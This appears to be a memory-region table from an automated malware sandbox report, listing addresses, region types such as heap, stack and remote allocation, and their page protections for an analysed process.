trusted library allocation
|
page read and write
|
||
|
6CAD000
|
stack
|
page read and write
|
||
|
262CBF71000
|
trusted library allocation
|
page read and write
|
||
|
8067EBE000
|
stack
|
page read and write
|
||
|
21F90000
|
direct allocation
|
page read and write
|
||
|
4470000
|
trusted library allocation
|
page execute and read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3C0000
|
trusted library allocation
|
page read and write
|
||
|
6CC0000
|
heap
|
page read and write
|
||
|
262CBFF5000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
23899000
|
trusted library allocation
|
page read and write
|
||
|
7F45000
|
trusted library allocation
|
page read and write
|
||
|
1CB084F0000
|
remote allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
5993000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
6E90000
|
heap
|
page readonly
|
||
|
24AF6000
|
heap
|
page read and write
|
||
|
24B43000
|
heap
|
page read and write
|
||
|
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
8067D79000
|
stack
|
page read and write
|
||
|
262E45D9000
|
heap
|
page read and write
|
||
|
7060000
|
heap
|
page read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
24F83000
|
trusted library allocation
|
page read and write
|
||
|
24A0C000
|
stack
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
7138000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
24B3C000
|
heap
|
page read and write
|
||
|
1CB08473000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
262CC45E000
|
trusted library allocation
|
page read and write
|
||
|
1CB082E7000
|
heap
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
7FFAAC1F6000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
1CB0853D000
|
heap
|
page read and write
|
||
|
24F6E000
|
stack
|
page read and write
|
||
|
24F81000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
1CB0842F000
|
heap
|
page read and write
|
||
|
262E4568000
|
heap
|
page read and write
|
||
|
1CB08308000
|
heap
|
page read and write
|
||
|
2A00000
|
trusted library section
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
262CC196000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
227A8000
|
stack
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
7E7F000
|
stack
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
5701000
|
trusted library allocation
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
2BEE000
|
unkown
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
29CF000
|
stack
|
page read and write
|
||
|
1CB084F0000
|
remote allocation
|
page read and write
|
||
|
262CA514000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
8068C0D000
|
stack
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
262E4510000
|
heap
|
page read and write
|
||
|
6F6A000
|
heap
|
page read and write
|
||
|
262CA59F000
|
heap
|
page read and write
|
||
|
262CC430000
|
trusted library allocation
|
page read and write
|
||
|
6EC06000
|
unkown
|
page readonly
|
||
|
71ED000
|
trusted library allocation
|
page read and write
|
||
|
262CDD76000
|
trusted library allocation
|
page read and write
|
||
|
6F66000
|
heap
|
page read and write
|
||
|
25930000
|
trusted library allocation
|
page read and write
|
||
|
1CB082F3000
|
heap
|
page read and write
|
||
|
1CB082EC000
|
heap
|
page read and write
|
||
|
8510000
|
direct allocation
|
page read and write
|
||
|
6FC1000
|
heap
|
page read and write
|
||
|
7FFB22715000
|
unkown
|
page readonly
|
||
|
AAC9000
|
direct allocation
|
page execute and read and write
|
||
|
2494C000
|
stack
|
page read and write
|
||
|
811C000
|
stack
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
4752000
|
trusted library allocation
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
24A80000
|
heap
|
page read and write
|
||
|
2499B000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
1CB08408000
|
heap
|
page read and write
|
||
|
6FC1000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24EAD000
|
stack
|
page read and write
|
||
|
7FFAAC440000
|
trusted library allocation
|
page read and write
|
||
|
262CC49B000
|
trusted library allocation
|
page read and write
|
||
|
6F5E000
|
heap
|
page read and write
|
||
|
1FF26A90000
|
heap
|
page read and write
|
||
|
2582E000
|
stack
|
page read and write
|
||
|
262CD2A8000
|
trusted library allocation
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
25020000
|
trusted library allocation
|
page read and write
|
||
|
1CB08308000
|
heap
|
page read and write
|
||
|
56F1000
|
trusted library allocation
|
page read and write
|
||
|
22640000
|
remote allocation
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
70FA000
|
heap
|
page read and write
|
||
|
262E4710000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
262E49B0000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
21F60000
|
direct allocation
|
page read and write
|
||
|
262E4630000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
80DD000
|
stack
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
8480000
|
direct allocation
|
page read and write
|
||
|
1CB084A1000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC144000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
256C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC310000
|
trusted library allocation
|
page execute and read and write
|
||
|
226BF000
|
stack
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
6B6D000
|
stack
|
page read and write
|
||
|
262CC814000
|
trusted library allocation
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
727E000
|
stack
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
262CA4FC000
|
heap
|
page read and write
|
||
|
25007000
|
trusted library allocation
|
page read and write
|
||
|
262CD830000
|
trusted library allocation
|
page read and write
|
||
|
228E4000
|
trusted library allocation
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
8067AFE000
|
stack
|
page read and write
|
||
|
7FFAAC322000
|
trusted library allocation
|
page read and write
|
||
|
262CC83A000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
6CB0000
|
heap
|
page read and write
|
||
|
7030000
|
direct allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
262E3FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC350000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
740C000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
262CDE00000
|
trusted library allocation
|
page read and write
|
||
|
6EC0D000
|
unkown
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
262E4748000
|
heap
|
page read and write
|
||
|
2F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
2A50000
|
trusted library allocation
|
page read and write
|
||
|
1CB08435000
|
heap
|
page read and write
|
||
|
7FFAAC140000
|
trusted library allocation
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
8067BFE000
|
stack
|
page read and write
|
||
|
6EF8000
|
heap
|
page read and write
|
||
|
262CC438000
|
trusted library allocation
|
page read and write
|
||
|
262CA680000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
262CDF14000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
262CDD53000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
226E0000
|
direct allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
2F02000
|
trusted library allocation
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
84F0000
|
direct allocation
|
page read and write
|
||
|
8CC9000
|
direct allocation
|
page execute and read and write
|
||
|
22640000
|
remote allocation
|
page read and write
|
||
|
84D0000
|
direct allocation
|
page read and write
|
There are 835 hidden memdumps, click here to show them.